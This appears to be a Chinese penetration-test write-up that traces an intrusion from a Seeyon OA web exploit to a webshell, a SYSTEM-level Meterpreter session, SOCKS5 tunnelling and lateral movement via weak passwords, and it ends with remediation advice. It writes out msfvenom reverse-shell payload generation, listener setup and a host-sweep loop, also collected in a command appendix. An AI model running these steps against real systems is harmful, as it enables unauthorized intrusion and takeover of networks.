渗透测试:从Web到内网
字数 1091 2025-08-03 16:43:00

渗透测试:从Web到内网实战指南

前言

本文记录了一次完整的渗透测试过程,从Web应用漏洞利用到内网横向移动,最终获取多台内网服务器权限的实战案例。

一、Web应用突破口

1.1 目标系统识别

  • 目标系统:致远OA系统
  • 特点:已知存在多个公开漏洞,网上有丰富的复现资料

1.2 漏洞利用

  • 使用自定义开发的OA系统EXP工具进行攻击
  • 上传Webshell(冰蝎马)获取初始立足点
  • 冰蝎连接成功,获得系统交互式shell

二、权限提升与信息收集

2.1 远程桌面服务检查

tasklist /svc | find "Ter"  # 检查TermService(RDP)是否运行
netstat -ano|findstr "3308"  # 查找RDP服务监听端口

发现RDP服务运行但无法连接,可能原因:

  • 远程桌面服务未开启
  • 更改了默认端口
  • 仅限内网访问

2.2 Meterpreter会话建立

使用MSF生成payload并上线:

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<端口> -f exe -o /root/vhs.exe

MSF监听设置:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost <监听IP>
set lport <监听端口>
exploit

2.3 权限提升

  • 初始权限:普通用户
  • 使用MSF默认提权模块成功获取SYSTEM权限

三、内网横向移动

3.1 隧道搭建

  • 使用开源工具NPS搭建SOCKS5代理隧道
  • 通过proxychains连接隧道,使攻击机IP变为目标内网IP

3.2 内网RDP连接

通过隧道成功连接内网远程桌面服务

3.3 内网主机发现

使用批处理命令扫描内网存活主机:

for /l %i in (1,1,255) do @ping 192.168.*.%i -w 1 -n 1 | find /i "ttl"

结果分析:

  • TTL=128:Windows系统
  • TTL=64:Linux系统
  • TTL=255:可能是路由器或网络设备

3.4 内网渗透成果

  1. Linux服务器

    • 通过SSH连接(IP: 192.168..103, 192.168..108)
    • 弱口令:123456789
  2. Windows服务器

    • 多台服务器存在相同弱口令:123456789
  3. 后台管理系统

    • 发现两个内网管理系统
    • 同样存在弱口令问题

四、修复建议

  1. OA系统

    • 及时更新补丁,修复已知漏洞
    • 限制文件上传功能
  2. 密码策略

    • 禁止使用简单弱口令
    • 实施复杂度要求(大小写字母、数字、特殊字符组合)
    • 定期更换密码
  3. 网络隔离

    • 加强内外网隔离
    • 限制RDP等服务的访问范围
  4. 监控措施

    • 部署入侵检测系统
    • 监控异常登录行为

五、技术要点总结

  1. Web突破

    • 熟悉常见OA系统漏洞
    • 掌握Webshell上传与连接技术
  2. 权限维持

    • Meterpreter会话建立
    • 多种提权方法
  3. 内网横向

    • 隧道技术(SOCKS5)
    • 内网主机发现技巧
    • TTL值分析系统类型
  4. 密码安全

    • 避免内网系统使用相同密码
    • 禁用常见弱口令

附录:常用命令速查

  1. 服务检查

    tasklist /svc | find "Ter"  # 检查TermService
    netstat -ano  # 查看所有网络连接
    
  2. 内网扫描

    for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"
    
  3. MSF生成Payload

    msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o payload.exe
    
  4. 隧道连接

    proxychains <command>  # 通过SOCKS隧道执行命令
    

本案例展示了从外网渗透到内网横向的完整流程,强调了内网系统密码安全的重要性,即使是内网系统也应实施严格的安全策略。

渗透测试:从Web到内网实战指南 前言 本文记录了一次完整的渗透测试过程,从Web应用漏洞利用到内网横向移动,最终获取多台内网服务器权限的实战案例。 一、Web应用突破口 1.1 目标系统识别 目标系统:致远OA系统 特点:已知存在多个公开漏洞,网上有丰富的复现资料 1.2 漏洞利用 使用自定义开发的OA系统EXP工具进行攻击 上传Webshell(冰蝎马)获取初始立足点 冰蝎连接成功,获得系统交互式shell 二、权限提升与信息收集 2.1 远程桌面服务检查 发现RDP服务运行但无法连接,可能原因: 远程桌面服务未开启 更改了默认端口 仅限内网访问 2.2 Meterpreter会话建立 使用MSF生成payload并上线: MSF监听设置: 2.3 权限提升 初始权限:普通用户 使用MSF默认提权模块成功获取SYSTEM权限 三、内网横向移动 3.1 隧道搭建 使用开源工具NPS搭建SOCKS5代理隧道 通过proxychains连接隧道,使攻击机IP变为目标内网IP 3.2 内网RDP连接 通过隧道成功连接内网远程桌面服务 3.3 内网主机发现 使用批处理命令扫描内网存活主机: 结果分析: TTL=128:Windows系统 TTL=64:Linux系统 TTL=255:可能是路由器或网络设备 3.4 内网渗透成果 Linux服务器 : 通过SSH连接(IP: 192.168. .103, 192.168. .108) 弱口令:123456789 Windows服务器 : 多台服务器存在相同弱口令:123456789 后台管理系统 : 发现两个内网管理系统 同样存在弱口令问题 四、修复建议 OA系统 : 及时更新补丁,修复已知漏洞 限制文件上传功能 密码策略 : 禁止使用简单弱口令 实施复杂度要求(大小写字母、数字、特殊字符组合) 定期更换密码 网络隔离 : 加强内外网隔离 限制RDP等服务的访问范围 监控措施 : 部署入侵检测系统 监控异常登录行为 五、技术要点总结 Web突破 : 熟悉常见OA系统漏洞 掌握Webshell上传与连接技术 权限维持 : Meterpreter会话建立 多种提权方法 内网横向 : 隧道技术(SOCKS5) 内网主机发现技巧 TTL值分析系统类型 密码安全 : 避免内网系统使用相同密码 禁用常见弱口令 附录:常用命令速查 服务检查 : 内网扫描 : MSF生成Payload : 隧道连接 : 本案例展示了从外网渗透到内网横向的完整流程,强调了内网系统密码安全的重要性,即使是内网系统也应实施严格的安全策略。